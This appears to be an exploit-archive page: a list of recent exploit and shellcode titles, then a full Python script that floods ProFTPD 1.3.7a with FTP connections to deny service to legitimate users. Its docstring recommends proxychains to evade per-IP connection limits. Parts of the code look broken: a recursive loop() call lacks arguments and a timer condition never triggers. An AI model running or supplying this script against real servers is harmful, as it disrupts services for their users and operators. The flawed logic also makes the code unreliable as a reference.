
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
101 lines
No EOL
2.6 KiB
Python
Executable file
101 lines
No EOL
2.6 KiB
Python
Executable file
# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service
|
|
# Date: 22/03/2021
|
|
# Exploit Author: xynmaps
|
|
# Vendor Homepage: http://www.proftpd.org/
|
|
# Software Link: https://github.com/proftpd/proftpd
|
|
# Version: 1.3.7a
|
|
# Tested on: Parrot Security OS 5.9.0
|
|
|
|
#-------------------------------#
|
|
|
|
#encoding=utf8
|
|
#__author__ = XYN/Dump/NSKB3
|
|
#ProFTPD Denial of Service exploit by XYN/Dump/NSKB3.
|
|
"""
|
|
ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
|
|
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
|
|
(if it's limited, just run this script from different proxies using proxychains, and it will work)
|
|
"""
|
|
|
|
import socket
|
|
import sys
|
|
import threading
|
|
import subprocess
|
|
import time
|
|
|
|
banner = """
|
|
._________________.
|
|
| ProFTPD |
|
|
| D o S |
|
|
|_________________|
|
|
|By XYN/DUMP/NSKB3|
|
|
|_|_____________|_|
|
|
|_|_|_|_____|_|_|_|
|
|
|_|_|_|_|_|_|_|_|_|
|
|
|
|
"""
|
|
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
|
|
|
|
def test(t,p):
|
|
s = socket.socket()
|
|
s.settimeout(10)
|
|
try:
|
|
s.connect((t, p))
|
|
response = s.recv(65535)
|
|
s.close()
|
|
return 0
|
|
except socket.error:
|
|
print("Port {} is not open, please specify a port that is open.".format(p))
|
|
sys.exit()
|
|
def attack(targ, po, id):
|
|
try:
|
|
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
|
#print("Worker {} running".format(id))
|
|
except OSError: pass
|
|
def main():
|
|
global target, port, start
|
|
print banner
|
|
try:
|
|
target = sys.argv[1]
|
|
except:
|
|
print usage
|
|
sys.exit()
|
|
try:
|
|
port = int(sys.argv[2])
|
|
except:
|
|
port = 21
|
|
try:
|
|
conns = int(sys.argv[3])
|
|
except:
|
|
conns = 50
|
|
print("[!] Testing if {0}:{1} is open".format(target, port))
|
|
test(target, port)
|
|
print("[+] Port {} open, starting attack...".format(port))
|
|
time.sleep(2)
|
|
print("[+] Attack started on {0}:{1}!".format(target, port))
|
|
def loop(target, port, conns):
|
|
global start
|
|
threading.Thread(target=timer).start()
|
|
while 1:
|
|
for i in range(1, conns + 3):
|
|
t = threading.Thread(target=attack, args=(target,port,i,))
|
|
t.start()
|
|
if i > conns + 2:
|
|
t.join()
|
|
break
|
|
loop()
|
|
|
|
t = threading.Thread(target=loop, args=(target, port, conns,))
|
|
t.start()
|
|
|
|
def timer():
|
|
start = time.time()
|
|
while 1:
|
|
if start < time.time() + float(900): pass
|
|
else:
|
|
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
|
t = threading.Thread(target=loop, args=(target, port,))
|
|
t.start()
|
|
break
|
|
|
|
main() |